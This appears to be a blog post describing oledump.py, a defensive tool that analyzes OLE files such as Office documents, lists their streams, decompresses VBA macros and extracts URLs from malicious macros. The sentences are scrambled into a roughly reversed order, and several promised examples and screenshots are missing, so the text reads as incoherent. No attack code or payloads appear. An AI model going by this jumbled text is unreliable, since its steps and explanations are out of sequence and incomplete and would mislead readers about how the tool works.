Like many of my analysis programs, oledump.py can analyze a file inside a (password protected) zip file. You might have noticed that the file analyzed in the above screenshot is a zip file. ![]() Plugin plugin_http_heuristics.py uses a couple of tricks to extract URLs from malicious, obfuscated VBA macros, like this: You can write plugins (in Python) to analyze streams. Use option -v to decompress the VBA macros: The source code of VBA macros is compressed when stored inside a stream. You can select a stream to dump its content: The letter M next to stream 7, 8, 9 and 10 indicate that the stream contains VBA macros. xls file and it will show you the streams: Oledump has an embedded man page: run oledump.py -m to view it. ppt, … are OLE files (docx, xlsx, … is the new file format: XML inside ZIP). ![]() Many applications use this file format, the best known is MS Office.doc. oledump allows you to analyze these streams. Oledump.py is a program to analyze OLE files ( Compound File Binary Format).
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |